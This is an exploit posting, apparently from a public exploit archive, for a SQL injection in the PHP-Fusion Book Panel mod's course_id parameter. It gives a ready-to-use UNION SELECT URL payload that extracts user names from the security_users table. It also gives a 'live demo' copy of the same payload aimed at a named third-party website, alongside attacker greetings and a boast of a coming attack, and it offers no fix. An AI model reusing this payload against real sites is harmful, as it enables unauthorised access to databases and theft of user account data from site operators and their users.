PHP-Fusion Mod Book Panel (course_id) SQL Injection Vulnerability
2009-03-10 19:00:39++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
exploit :
8182
home : http://www.security-dz.com / soon mirror attack for sub-z3ro
contacte : [email protected]
exploited by: SuB-ZeRo
Greetings: x.CJP.x & AnGeL25Dz
-------------------------------------------------------------------------------------------------------------------------------------
Exploit:
http://site.com/[path]/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--
live demo :
http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.

